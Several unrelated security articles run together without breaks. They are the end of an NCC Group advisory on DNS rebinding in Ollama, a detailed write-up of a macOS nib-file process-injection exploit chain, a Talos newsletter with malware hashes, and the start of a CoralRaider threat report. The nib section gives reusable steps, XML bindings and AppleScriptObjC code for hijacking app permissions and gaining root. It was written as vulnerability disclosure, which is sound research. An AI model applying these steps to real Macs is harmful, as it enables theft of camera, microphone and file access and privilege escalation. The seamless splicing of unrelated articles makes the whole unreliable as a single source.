DNS rebinding attacks can also be prevented by validating the Host HTTP header on the server-side to only allow a set of authorized values. For services listening on the loopback interface, this set of whitelisted host values should only contain localhost, and all reserved numeric addresses for the loopback interface, including 127.0.0.1.

For instance, let’s say that a service is listening on address 127.0.0.1, TCP port 3000. Then, the service should check that all HTTP request Host header values strictly contain 127.0.0.1:3000 and/or localhost:3000. If the host header contains anything else, then the request should be denied.

Depending on the application deployment model, you may have to whitelist other or additional addresses such as 127.0.0.2, another reserved numeric address for the loopback interface.

Filtering DNS responses containing private, link-local or loopback addresses, both for IPv4 and IPv6, should not be relied upon as a primary defense mechanism against DNS rebinding attacks.

Vendor Communication:

  • 2024-03-08 – NCC Group emailed Ollama asking for security contact address.
  • 2024-03-08 – Ollama confirmed security contact address.
  • 2024-03-08 – NCC Group disclosed the issue to Ollama.
  • 2024-03-08 – Ollama indicated they are working on a fix.
  • 2024-03-08 – Ollama released a fix in Ollama GitHub repository main branch.
  • 2024-03-09 – NCC Group tested the fix, and informed Ollama that the fix successfully addressed the issue.
  • 2024-03-09 – Ollama informed NCC Group that they are working on a new release incorporating the fix.
  • 2024-03-11 – NCC Group emailed Ollama asking whether an 2024-04-08 advisory release date is suitable.
  • 2024-03-14 – Ollama released Ollama version v0.1.29, which includes the fix.
  • 2024-03-18 – NCC Group emailed Ollama asking to confirm whether an 2024-04-08 advisory release date is suitable.
  • 2024-03-23 – Ollama stated that the 2024-04-08 advisory release date tentatively worked. Ollama asked if later date suited, as they wanted to continue monitoring the rollout of the latest version of Ollama, to make sure enough users have updated ahead of the disclosure.
  • 2024-03-25 – NCC Group reiterated preference for 2024-04-08 advisory release date, noting that the code fix is visible to the public in the Ollama repository main branch since 2024-03-08.
  • 2024-04-04 – NCC Group sent an email indicating that the advisory will be published on 2024-04-08.
  • 2024-04-08 – NCC Group released security advisory.

Acknowledgements:

Thanks to the Ollama team, and Kevin Henry, Roger Meyer, Javed Samuel, and Ristin Rivera from NCC Group for their support during the disclosure process.

About NCC Group:

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

2024-04-08: Release date of advisory

Written by: Gérald Doussot

Bringing process injection into view(s): exploiting all macOS apps using nib files

In a previous blog post we described a process injection vulnerability affecting all AppKit-based macOS applications. This research was presented at Black Hat USA 2022, DEF CON 30 and Objective by the Sea v5. This vulnerability was actually the second universal process injection vulnerability we reported to Apple, but it was fixed earlier than the first. Because it shared some parts of the exploit chain with the first one, there were a few steps we had to skip in the earlier post and the presentations. Now that the first vulnerability has been fixed in macOS 13.0 (Ventura) and improved in macOS 14.0 (Sonoma), we can detail the first one and thereby fill in the blanks of the previous post.

This vulnerability was independently found by Adam Chester and written up here under the name “DirtyNIB”. While the exploit chain demonstrated by Adam shares a lot of similarity to ours, our attacks trigger automatically and do not require a user to click a button, making them a lot more stealthy. Therefore we decided to publish our own version of this write-up as well.

Process injection by replacing resources

To recap, process injection is the ability of one process to execute code as if it is (from the point of view of the OS) another process. This grants it the permissions and entitlements of that other process. If that other process has special permissions (for example if the user granted access to the microphone or webcam or if it has an entitlement), then the malicious application can now also abuse those privileges.

One well known example of a process injection technique involves Electron applications. Electron is a framework that can be used to combine a web application with a Chromium runtime to create a desktop application, allowing developers to use the same codebase for their web application and their desktop apps.

The way code-signing of application bundles on macOS worked prior to macOS 13.0 (Ventura) is as follows. There are two different ways the code signature of an application can be checked: a shallow code-signing check and a deep code-signing check.

When an application has been downloaded from the internet (meaning it is quarantined), Gatekeeper performs a deep code-signing check, which means that all of the files in the app bundle are verified. For large applications (e.g. Xcode) and slow disks this can take multiple minutes.

When an application is not quarantined, only a shallow code-signing check is performed, which means only the signature on the executable itself is checked. If the executable enables the hardened runtime feature “library validation”, then additionally all frameworks are checked when they are loaded to verify that they are signed by the same developer or Apple. This means that for an application that is not recently downloaded by a browser, the non-executable resources in the application bundle are not validated by a code-signing check on launch.

Electron applications contain part of their code in JavaScript files, therefore these files are not verified by the shallow code-signing check. This allowed the following process injection attack against these applications:

  1. Copy the application to a writeable location.
  2. Replace the JavaScript with malicious JavaScript files.
  3. Launch the modified application.

Now the malicious JavaScript can use the permissions of the original application, for example to access the webcam or microphone without the user giving approval. (Electron is especially popular for applications supporting video calls!)

As this attack was well known, it got us thinking: what other resources might there be included in app bundles that could lead to process injection? Then, we spotted the MainMenu.nib file hiding in plain sight in many macOS applications. As it turned out, that file can also be swapped and a shallow code-signing check will still pass. What could the full impact be if we replaced that file?

Nib files background

Nib (short for NeXT Interface Builder) files are mainly used to design the user interface of a native macOS application. To quote Apple’s documentation:

A nib file describes the visual elements of your application’s user interface, including windows, views, controls, and many others. It can also describe non-visual elements, such as the objects in your application that manage your windows and views. Most importantly, a nib file describes these objects exactly as they were configured in Xcode. At runtime, these descriptions are used to recreate the objects and their configuration inside your application. When you load a nib file at runtime, you get an exact replica of the objects that were in your Xcode document. The nib-loading code instantiates the objects, configures them, and reestablishes any inter-object connections that you created in your nib file.

The logo for Interface Builder.

In the past, nib files were edited directly with an application called “Interface Builder”, hence the name. Nowadays, this is integrated into Xcode and it no longer directly edits nib files, but XML-based files (xib files) which are then compiled into nib files, as text based files are easier to manage in a version control system. While new options exist for creating the GUI (StoryBoards and SwiftUI), many applications still include at least one nib file.

Nib deserialisation exploitation

We will now evaluate step by step what we can do if we replace the nib file in an application with a malicious version. Each step will be a small increase what we can do, eventually leading up to code execution that is equivalent to native code.

Step 1: take control

Let’s have a look at a newly created Xcode project using the macOS “App” template, using xibs for the interface.

Creating a new macOS app.

We end up with a file called main.m containing:

int main(int argc, const char * argv[]) {
    @autoreleasepool {
        // Setup code that might create autoreleased objects goes here.
    }
    return NSApplicationMain(argc, argv);
}

As the comment suggests, app developers can implement some setup here, but by default it only calls NSApplicationMain. That function performs a lot of different steps to turn a process into an application. The documentation for this function explains what it does:

Creates the application, loads the main nib file from the application’s main bundle, and runs the application. You must call this function from the main thread of your application, and you typically call it only once from your application’s main function. Your main function is usually generated automatically by Xcode.

How it determines the main nib file is by parsing the Info.plist file in the application bundle and looking up the value for the NSMainNibFile key. The nib file with that name is then loaded and instantiated.

Contents of the Info.plist file:

...
<key>NSMainNibFile</key>
<string>MainMenu</string>
...

The default template contains an implementation for one new class, AppDelegate, which gets instantiated by the nib file. In the method -applicationDidFinishLaunching:, the developer can perform further setup that should happen after the nib file is loaded. In most applications, this is the place where control is handed back to the application’s own code and the custom initialization starts.

@implementation AppDelegate

- (void)applicationDidFinishLaunching:(NSNotification *)aNotification {
    // Insert code here to initialize your application
}


- (void)applicationWillTerminate:(NSNotification *)aNotification {
    // Insert code here to tear down your application
}


- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
    return YES;
}


@end

If an application is structured following this template, this means that replacing the nib file means most of the original code in the application will not run, except for the extra setup in main(). This means we do not get any conflicts with the normal application code. While not essential for exploitability, it is convenient, especially for making this attack more stealthy.

Step 2: create objects

In the template, the nib file instantiates an object of the class AppDelegate. Looking at that class header, we see no use of the NSCoding protocol or anything similar that would enable deserialization for this class.

@interface AppDelegate : NSObject <NSApplicationDelegate>


@end

While nib files are similar to data serialized with NSCoder, this demonstrates that implementing NSCoding or NSSecureCoding is not needed to allow an object to be instantiated as part of a nib. In fact, objects of (almost) all classes can be created by including them in a nib file and instantiating the nib file.

Going back to the Apple documentation page confirms this:

  1. [The underlying nib-loading code] unarchives the nib object graph data and instantiates the objects. How it initializes each new object depends on the type of the object and how it was encoded in the archive. The nib-loading code uses the following rules (in order) to determine which initialization method to use.

    a. By default, objects receive an initWithCoder: message. […]

    b. Custom views in OS X receive an initWithFrame: message. […]

    c. Custom objects other than those described in the preceding steps receive an init message.

There are a couple of classes that do not support any of these three methods, but which only have specialized init functions or constructors. Except for those, objects of any class can be created in a nib file, even “dangerous” classes like NSTask or NSAppleScript.

At this point we can:

  1. Stop the application’s own code from executing.
  2. Create objects of arbitrary classes.

Step 3: calling zero argument methods

The trick for calling methods without any arguments is the same as in the previous post: by creating bindings. For example, binding with a keypath of launch to an NSTask object will call the method -launch as soon as the objects have been instantiated and the bindings are created (see the previously mentioned Apple documentation page).

Creating these bindings from Xcode is not always possible, as one should only bind to properties of a model. However, the XML based format of xibs makes it quite easy to manually create bindings to any object and with any keypath. In addition, this allows specifying the order in which the methods will be invoked, because bindings are created in the order of how the “id” attributes of these bindings are sorted.

For example, the following XML would bind the “title” property of a window to the “launch” keypath of an NSTask object:

<objects>
    <customObject id="N6N-4M-Hac" userLabel="the task" customClass="NSTask">
        [...]
    </customObject>

	<window title="Window" allowsToolTipsWhenApplicationIsInactive="NO" autorecalculatesKeyViewLoop="NO" releasedWhenClosed="NO" animationBehavior="default" id="QvC-M9-y7g">
	    [...]

	    <connections>
	        <binding destination="N6N-4M-Hac" name="title" keyPath="launch" id="cy5-GO-ArU"/>
	    </connections>
	</window>

	[...]
</objects>

While we can call -launch, we have not set the executable path or arguments for this NSTask, so this will not be very useful yet.

At this point we can:

  1. Stop the application’s own code from executing.
  2. Create objects of arbitrary classes.
  3. Call zero-argument methods on these objects.

Step 4: calling arbitrary methods

For buttons or menu items it is possible to use a binding for the target with a selector. This determines what method it will call and on what object when the user clicks it. These bindings are quite flexible, even allowing any number of arguments (Argument2, etc.) for the call to be specified.

Calling an arbitrary method using a binding.

This would allow us to call arbitrary methods once the user clicks it. However, we don’t want to wait for that. We want all of our code to run automatically once the nib loads.

As it turns out, if we set up the bindings for the target and the arguments of a menu item and then call the private method _corePerformAction, it will execute the method for its action, just like when the user would have clicked it. Because that method itself requires no arguments, we can call it using the previous primitive. This means that we create two bindings (or more, if we want to pass arguments): first to set the target and selector, then the bindings for the arguments and finally one to call _corePerformAction. This allows us to call arbitrary methods, with any number of arguments. The arguments for this call can be any we object (optionally with a keypath) we can bind to in the nib.

This still has two limitations:

  • We can not save the result of the call.
  • We can not pass any non-object values, such as integers or arbitrary pointers.

In practice, these restrictions did not turn out to be very important to us.

At this point we can:

  1. Stop the application’s own code from executing.
  2. Create objects of arbitrary classes.
  3. Call zero-argument methods on these objects.
  4. Call methods with arbitrary objects as arguments, without saving the result.

Step 5: string constants

For some methods, we would like to refer to certain constant values, for example strings. While NSString implements NSSecureCoding and therefore we should be able to include them as serialised objects in the nib file, it was not clear how we could actually write that into a xib. Thankfully, we found a simple trick: we can create an NSTextView, fill it with text in Xcode and then bind to this view with the keypath title. (Ironically, this means we are now using bindings in the opposite direction from how they are intended to be used, instead of binding our view to the model, we are binding our “model” to the view!)

Putting all of this together, we now have a way to execute arbitrary AppleScript in any application:

  1. We add an object of the class NSAppleScript to the xib.
  2. We add an NSTextField to the xib, containing the script we want to execute.
  3. We setup two NSMenuItems, with bindings to call the methods -initWithSource: 1 and -executeAndReturnError: on the NSAppleScript object.
  4. For the -initWithSource: binding we bind one argument, the title of the NSTextField element. For the -executeAndReturnError: we add no argument, as we don’t care about the error result (as we’re already done then).
  5. We create two extra menu items (could be any other objects as well) to bind to the _corePerformAction property on the other menu items to trigger their action. The order of the bindings is set to bind the target and arguments first, then create the two _corePerformAction bindings.

Once this nib file is loaded in any application, it runs our custom AppleScript inside that process.

We have turned the interface builder component of Xcode into an IDE.

We have now turned the xib editor of Xcode into our AppleScript IDE!

Executing arbitrary AppleScript allows us to:

  • Read or modify files with the permissions of the application (e.g. read the user’s emails if we attack Mail.app or an application with Full Disk Access).
  • Execute shell commands. These inherit the TCC permissions of the application, so in any commands we execute we can access the microphone and webcam if the original application had that permission.

This was a great result and already demonstrated the vulnerability. But there was a privilege escalation exploit we wanted to demonstrate that we could not yet do with the primitives we had. We needed to go a bit further.

Interlude: scripting runtimes in macOS

For one of the three exploit paths we wanted to implement, evaluating AppleScript was not enough. We needed to abuse an entitlement which was not inherited by any child process and the APIs it requires were not accessible from AppleScript. In addition, we could not load new native code into the application due to the library validation of the hardened runtime.

To summarize, what we could do up to this point:

  1. Stop the application’s own code from executing.
  2. Create Objective-C objects of arbitrary classes.
  3. Call zero-argument methods on these objects.
  4. Call methods with arbitrary objects as arguments (without saving the result).
  5. Create string literals.

What we wanted to be able to do in addition:

  • Call C functions.
  • Create C structs.
  • Work with C pointers (e.g. char *).

One thing we can do is load more frameworks signed by Apple. Therefore, we looked at the dynamic languages included in macOS to determine if they would allow us to perform some of the operations we could not yet do. (Note that this was before Apple decided to remove Python.framework from macOS.)

We found the following runtimes in Apple signed frameworks:

  • AppleScript
  • JavaScript
  • Python
  • Perl
  • Ruby

(We later also found Tcl and Java, but we did not look at them then.)

Most of these were unsuitable in some way. AppleScript does not have a FFI, JavaScript requires explicitly exposing specific methods to the script. Perl and Ruby do have C FFI libraries, but these require writing small stubs that are compiled. Loading those would be blocked by library validation.

Python.framework was the only suitable option: the ctypes module (included on macOS) allowed everything we needed and it worked even with the hardened runtime enabled2.

We could load Python.framework into an application, but that does not immediately start executing any Python code. In order to run Python code, we would need to call a C function first, as Python.framework only has a C API. We needed another intermediate step before we could call Python.

Step 6: AppleScriptObjC.framework

There was one language option we had missed initially: AppleScript with the AppleScriptObjC bridge. This allows executing AppleScript, just like NSAppleScript, but with access to the Objective-C runtime. It allows defining new classes that are implemented entirely in AppleScript and (importantly for us) it allows calling C functions.

This requires loading an additional framework: AppleScriptObjC.framework. As this is signed by Apple, we could load it into any application. Then, although the hardened runtime doesn’t allow loading new native code, we could load only the AppleScriptObjC scripts from an (unsigned) bundle by calling -loadAppleScriptObjectiveCScripts.

The C functions we can call are limited: we can only pass primitive values (integers etc.) or Objective-C object pointers. We can not work with arbitrary pointers, so passing structs or char* values is impossible. Therefore, this was not yet enough and we did need to evaluate Python.

We could now:

  1. Stop the application’s own code from executing.
  2. Create objects of arbitrary classes.
  3. Call zero-argument methods on these objects.
  4. Call methods with arbitrary objects as arguments (without saving the result).
  5. Create string literals.
  6. Call C functions (with Objective-C objects or primitive values as arguments).

Step 7: Calling Python

If you look at the Python C interface, you’ll see that all functions to pass some Python to execute require C strings (char*/wchar_t*): either the file path for a script or the script itself. As mentioned, we could not pass objects of these types with the AppleScriptObjC bridge.

We bypassed that by calling the function Py_Main(argc, argv) with argc set to 0. This is the same function that would be called by the python executable when invoked via the command line, which means that calling it with no arguments starts a REPL. By calling it like this, we could start a Python REPL in the compromised application. Passing Python code to execute could be done by writing it into the stdin of the process.

Our AppleScriptObjC code to achieve this was:

use framework "Foundation"
use scripting additions

script Stage2
    property parent : class "NSObject"
    
    on initialize()
        tell current application to NSLog("Hello world from AppleScript!")
        
        -- AppleScript seems to be unable to handle pointers in the way needed to use SecurityFoundation. Therefore, this is only used to load Python.
        current application's NSBundle's alloc's initWithPath_("/System/Library/Frameworks/Python.framework")'s load

        current application's Py_Initialize()

        -- This starts Python in interactive mode, which means it executes stdin, which is passed from the parent process.
        tell current application to NSLog("Py_Main: %d", Py_Main(0, reference))
    end initialize
    
    on encodeWithCoder_()
    end encodeWithCoder_
    
    on initWithCoder_()
    end initWithCoder_
end script

With ctypes, we can now run Python code that can do essentially the same as native code can do: call any C functions, create structs, dereference points, create C character strings, etc.

The Python script we executed was a straightforward adaptation of the privilege escalation exploit from Unauthd - Logic bugs FTW by A2nkF: installing a specific Apple signed package file to a RAM disk executes a script from that disk as root.

Impact

Just like the vulnerability in previous blog post, this vulnerability could be applied in different ways on macOS Big Sur (which was in beta at the time of reporting):

  • Stealing the TCC permissions and entitlements of applications, which could allow access to webcam, microphone, geolocation, sensitive files like the Mail.app database and more.
  • Privilege escalation to root using the system.install.apple-software entitlement and macOSPublicBetaAccessUtility.pkg.
  • Bypassing SIP’s filesystem restrictions by abusing the com.apple.rootless.install.heritable entitlement of “macOS Update Assistant.app”.

The following video demonstrates the elevation of privileges and bypassing SIP’s filesystem restrictions on the macOS Big Sur beta. (Note that this video is at 200% speed because installing the package is quite slow and invisible.)

Unlike the previous blogpost, we did not find a way to escape the sandbox, as sandboxed applications can not copy another application and launch it. While nib files are also used in iOS apps, we did not find a way to apply this technique there, as the iOS app sandbox makes modifying another application’s bundle impossible too. Aside from that, the exploit would also need to follow a completely different path, as bindings, AppleScript and Python do not exist on iOS.

The fixes

This vulnerability was fixed in macOS Ventura by adding a new protection to macOS. When an application is opened for the first time (regardless of whether it is quarantined), a deep code-signing check is always performed. Afterwards, the application bundle is protected. This protection means that only applications from the same developer (or specifically allowed in the application’s Info.plist file) are allowed to modify files inside the bundle. A new TCC permission “App Management” was added to allow other applications to modify other application bundles as well. As far as we are aware, Apple has not backported these changes to earlier macOS versions (and Apple has clarified that they no longer backport all security fixes to macOS versions before the current major version). This change addresses not just this issue, but the issue with replacing the JavaScript in Electron applications as well.

Note that Homebrew asks you to grant “App Management” (or “Full Disk Access”) permission to your terminal. This is a bad idea, as it would make you vulnerable to these attacks again: any non-sandboxed application can execute code with the TCC permissions of your terminal by adding a malicious command to (e.g.) ~/.zshrc. Granting “App Management” or “Full Disk Access” to your terminal should be considered the same as disabling TCC completely.

As this issue took a while to fix, other changes have also impacted this vulnerability and our exploit chain. We initially developed our exploit for macOS Catalina (10.15) and the macOS Big Sur (11.0) beta.

  • In macOS 11.0, Apple added the Signed System Volume (SSV), which means the integrity of resources for applications on the SSV is already covered by the SSV’s signature. Therefore, the code signature of applications on the SSV no longer covers the resources.
  • In macOS 12.3, Apple removed the bundled Python.framework. This broke the exploit chain used for privilege escalation, but not addressing the core vulnerability. In addition, it would be possible to use the Python3 framework bundled in Xcode instead.
  • In macOS 13.0, Apple introduced launch constraints, making it impossible to launch applications bundled with the OS that were copied to a different location. This means that copying and modifying the apps included in macOS was no longer possible. However, many non-constrained applications with interesting entitlements still remain.

CVE-2021-30873

Now, how did we use this for the vulnerability from the previous blog post? As it turns out, NSNib, the class representing a nib file itself, is serializable using NSCoding, so we could include a complete nib file in a serialized object.

Therefore, we only needed a chain of three objects in the serialized data:

  1. NSRuleEditor, setup to bind to -draw of the next object.
  2. NSCustomImageRep, configured to with the selector -instantiateWithOwner:topLevelObjects: to be called on the next object when the -draw method is called.
  3. NSNib using one of the payloads as described on this page.

As NSCustomImageRep calls its selector with no arguments, the owner and topLevelObjects pointers are whatever those registers happened to contain at the time of the call. As topLevelObjects is an NSArray ** (it is an out variable for an NSArray * pointer), it will attempt to write to this, which will crash when this write happens. However, our exploits have already executed at that point, so this does not matter for demonstration purposes.

Timeline

  • September 28, 2020: Reported to [email protected]. The report, code and video were attached as a Mail Drop link, as suggested by Apple’s “Report a security or privacy vulnerability” page for sharing large attachments.
  • October 28, 2020: At the request of product-security, we resent the attachment as the Mail Drop link had expired after 30 days.
  • December 16, 2020: At the request of product-security, we resent the attachment again as the Mail Drop link had expired again after 30 days.
  • October 21, 2021: Product Security emails that fixes are scheduled for Spring 2022.
  • May 26, 2022: Product Security emails that the planned fix had lead to performance regressions and a different fix is scheduled for Fall 2022.
  • June 6, 2022: macOS Ventura Beta 1 was released with the App Management permission.
  • Augustus 29, 2022: Informed Apple of multiple bypasses for App Management permission in the macOS Ventura Beta.
  • October 24, 2022: macOS Ventura was released with the App Management permission and launch constraints.
  • September 26, 2023: macOS Sonoma was released, fixing one of the bypasses for the App Management permission (CVE-2023-40450).

  1. This means we are actually initializing this object twice, as -init as already called and now we’re calling -initWithSource:. While this is not correct in Objective-C, it appears most classes don’t break if you do this. ↩︎

  2. One feature of the ctypes module was not: for passing Python function as a callback in C it tries to map WX memory, which is not allowed. As this feature was not needed for our exploit, disabling this was easy enough. ↩︎

There are plenty of ways to improve cybersecurity that don’t involve making workers return to a physical office

There are plenty of ways to improve cybersecurity that don’t involve making workers return to a physical office

As my manager knows, I’m not the biggest fan of working in a physical office. I’m a picky worker — I like my workspace to be borderline frigid, I hate dark mode on any software, and I want any and all lighting cranked all the way up.  

So, know that I’m biased going into this, but I also can’t get over the idea that companies are using cybersecurity as an excuse to create return-to-office policies in 2024.  

I started thinking about this because of the video game developer Rockstar, which owns some of the largest video game franchises on the planet like Red Dead Redemption and Grant Theft Auto. 

The company recently started asking its employees to return to its physical office five days a week in the name of productivity and security as the company pushes to finish its highly anticipated title “Grand Theft Auto VI.”  

Rockstar has long faced a number of cybersecurity concerns over the years, including a massive leak featuring early, in-progress gameplay of GTA VI in 2022 and other sensitive data. The attack was eventually attributed to the Lapsus$ group, and the perpetrator was eventually charged and sentenced. The first reveal trailer for the game was also leaked ahead of time.  

Many other companies have started to implement return-to-office policies over the past two years, citing various things ranging from worker productivity to interpersonal camaraderie, real estate costs, and more. I’m willing to hear arguments for all those things, but simply thinking that having employees all in one physical space is going to solve security problems seems far-fetched to me.  

We’ve written and talked about the various ways remote work has influenced cybersecurity since the onset of the COVID-19 pandemic. There’s no doubt that admins have had to implement new login methods, security controls and policies since more workers across the globe started working remotely. But four years into this trend, there’s no excuse to not be prepared to have remote workers anymore. 

An April 2023 study from Kent State University found that remote workers are more likely to be vigilant of security threats and take actions to ward them off than their in-office counterparts.  

The use of multi-factor authentication during the rise in remote work has skyrocketed, but often, this requirement is actually dropped if a user is physically in the office or accessing an on-site machine because of the perceived security of being in the office.  

The perceived security of a physical office can sometimes lull admins into a false sense of security, too, because machines located on-site may lack pre-boot authentication or encryption that’s commonly found on remote workers’ devices.  

I’m not saying that working in an office is inherently less secure than remote work, but I do believe that the risks are essentially the same. Regardless of where an employee is working from, they should be using app-based MFA to access all their services. Sensitive software and hardware should rely on passkeys or physical token access rather than outdated password policies that create easy-to-guess or shareable text-based passwords.  

And if security is the name of the game when asking employees to come back into the office, there’s still going to be a monetary investment that comes with that, too. 

Cisco’s recently published Global Hybrid Work study found that only 28 percent of responding employees say they would rank their employers’ office’s “Privacy and security features” as “very well.” To me, that says that even if employers want workers back in the office, they still need to upgrade their security, which is always going to mean more money and greater manpower.  

Security fundamentals should stay the same, no matter where your employees are. And suppose security is a chief concern for a company in wanting to go back to the “traditional” office lifestyle. In that case, I’m willing to bet they still have security gaps to overcome that simply can’t be solved by thinking they’ll be able to keep a closer eye on employees while they’re in the office to keep them from clicking on a phishing email. 

The one big thing 

Remote system management/desktop access tools such as AnyDesk and TeamViewer have grown in popularity since 2020. While there are many legitimate uses for this software, adversaries are also finding ways to use them for command and control in their campaigns. Cisco Talos Incident Response (Talos IR) has recently seen a spike in actors using this type of software as a method of gaining initial access to a network or to spy on the actions of users. Talos IR noted in its Quarterly Trends report for the third quarter of 2023, “AnyDesk was observed in all ransomware and pre-ransomware engagements [. . .], underscoring its role in ransomware affiliates' attack chains.” 

Why do I care? 

The use of these types of tools has increased since the start of the COVID-19 pandemic when remote work became more common. Since this software is legitimate, it can be easy for an attacker to compromise it and sit undetected on a network, bypassing traditional blocking methods. These tools introduce the ability for an adversary to potentially take full remote control of a system, are easy to download and install, and can be very difficult to detect since they are considered legitimate software. 

So now what? 

Adopting one, or at most two, approved remote management solutions will allow the organization to thoroughly test and deploy in the most secure possible configuration. Once a solution is approved and championed for the organization, other remote management/access tools should be explicitly banned by policy. Due to the complexity of implementing all these controls, detection rules can serve as a backup in case an adversary finds a way to circumvent these mitigations. 

Top security headlines of the week 

The U.S. and Britain have jointly filed chargers and sanctions against a Chinese state-sponsored actor known as APT31. The group is accused of a sweeping espionage campaign allegedly linked to China's Ministry of State Security (MSS) in the province of Hubei. The group reportedly targeted thousands of U.S. and foreign politicians, foreign policy experts and other high-profile targets. Individuals in the White House, U.S. State Department and spouses of officials were also among those targeted. The attacks aligned with geopolitical events affecting China, including economic tensions with the U.S., arguments over control of the South China Sea, and pro-democracy rallies in Hong Kong in 2019. A release from the U.S. Department of Justice stated that the campaigns involved more than 10,000 malicious emails, sent to targets in multiple continents, in what it called a “prolific global hacking operation.” The charges go on to say that APT31 hoped to compromise government institution networks and stealing trade secrets. Seven Chinese nationals are the target of the new sanctions for their alleged involvement with APT31, including the Wuhan XRZ corporation that is tied to the threat actor. (Reuters, U.S. Department of Justice

A silent backdoor on Linux machines was almost a massive supply chain attack, before a lone developer found malicious code hidden in software updates. The malicious code was hidden in two updates to xz Utils, an open-source data compression utility available on almost all installations of Linux and other Unix-like operating systems. Had it been successfully deployed, adversaries could have stashed malicious code in an SSH login certificate, upload it and execute it on the backdoored device. Whoever is behind this code likely spent years working on it, with open-source updates going back to 2021. The actor never actually took advantage of the malicious code, so it’s unclear what they planned to upload. Researchers eventually identified the vulnerability as CVE-2024-3094. The U.S. Cybersecurity and Infrastructure Security Agency warned government agencies to downgrade their xz Utils to older versions. (Ars Technica, Dark Reading

There is a massive backup with the National Vulnerabilities Database and, consequently, MITRE is unable to compile a list of all new vulnerabilities. A recent study from Flashpoint found that there was backlog of more than 100,000 vulnerabilities with no CVE number, and consequently, hadn’t been included in the NVD. Of those, 330 vulnerabilities had been exploited in the wild, yet defenders had not been made aware of them. The National Institute of Standards and Technology blamed the backup on an increase in the volume of software available to the public, leading to a larger number of vulnerabilities, as well as “a change in interagency support.” NIST has only analyzed about half of the more than 8,700 vulnerabilities that had been submitted so far in 2024. And in March alone, they only analyzed 199 out of the 3,370 vulnerabilities submitted. Several organizations have tried launching their own alternatives to the NVD, though adoption can still take a long time. NIST has also vowed to remain dedicated to the NVD and that it’s still regrouping its current efforts. (SecurityWeek, The Record by Recorded Future

Can’t get enough Talos? 

Upcoming events where you can find Talos 

Botconf (April 23 - 26) 

Nice, Côte d'Azur, France

This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.

CARO Workshop 2024 (May 1 - 3) 

Arlington, Virginia

Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

RSA (May 6 - 9) 

San Francisco, California    

Most prevalent malware files from Talos telemetry over the past week 

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
MD5: 7bdbd180c081fa63ca94f9c22c457376 
Typical Filename: c0dwjdi6a.dll |
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256: 744c5a6489370567fd8290f5ece7f2bff018f10d04ccf5b37b070e8ab99b3241
MD5: a5e26a50bf48f2426b15b38e5894b189
Typical Filename: a5e26a50bf48f2426b15b38e5894b189.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Generic::1201

SHA 256: 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66
MD5: 8b84d61bf3ffec822e2daf4a3665308c
Typical Filename: RemComSvc.exe
Claimed Product: N/A 
Detection Name: W32.3A2EA65FAE-95.SBX.TG

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647 
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790 
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir 
Claimed Product: N/A 
Detection Name: Win.Dropper.Scar::1201 

SHA 256: 62dfe27768e6293eb9218ba22a3acb528df71e4cc4625b95726cd421b716f983
MD5: 0211073feb4ba88254f40a2e6611fcef
Typical Filename: UIHost64.exe
Claimed Product: McAfee WebAdvisor
Detection Name: Trojan.GenericKD.68726899

CoralRaider targets victims’ data and social media accounts

  • Cisco Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. 
  • This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts.
  • They use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads in the campaign we analyzed.
  • The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

CoralRaider operators likely based in Vietnam 

CoralRaider targets victims’ data and social media accounts

Talos assesses with high confidence that the CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hardcoded in their payload binaries. The actor’s IP address is located in Hanoi, Vietnam. 

CoralRaider targets victims’ data and social media accounts

 Our analysis revealed that the actor uses a Telegram bot, as a C2, to exfiltrate the victim’s data. This allowed us to collect information and uncover several invaluable indicators about the origin and activities of the attacker. 

The attacker used two Telegram bots: A “debug” bot for debugging, and an “online” bot where victim data was received. However, a Desktop image in the “debug” bot had a similar desktop and Telegram to the “online” bot. This showed that the actor possibly infected their own environment while testing the bot. 

CoralRaider targets victims’ data and social media accounts

CoralRaider targets victims’ data and social media accounts

Analyzing the images of the actor’s Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named “Kiém tien tử Facebook,” “Mua Bán Scan MINI,” and “Mua Bán Scan Meta.” Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded. 

In an image from the “debug bot,” we spotted the Windows device ID (HWID) and an IP address (118[.]71[.]64[.]18), located in Hanoi, Vietnam, that is likely to be CoralRaider’s IP address.

Talos’ research uncovered two other images that revealed a few folders on their OneDrive. One of the folders had a Vietnamese name, “Bot Export Chiến,” which is the same as one of the folders in the PDB strings of their loader component. Pivoting on the folder path in the PDB string, we discovered a few other PDB strings having similar paths but different Vietnamese names. We analyzed the discovered samples with the PDB strings and found they belong to the same loader family, RotBot. The Vietnamese name in the PDB string of the loader binary further strengthens our assessment that CoralRaider is of Vietnamese origin.

D:\ROT\ROT\Build rot Export\2024\Bot Export Khuê\14.225.210.XX-Khue-Ver 2.0\GPT\bin\Debug\spoolsv.pdb

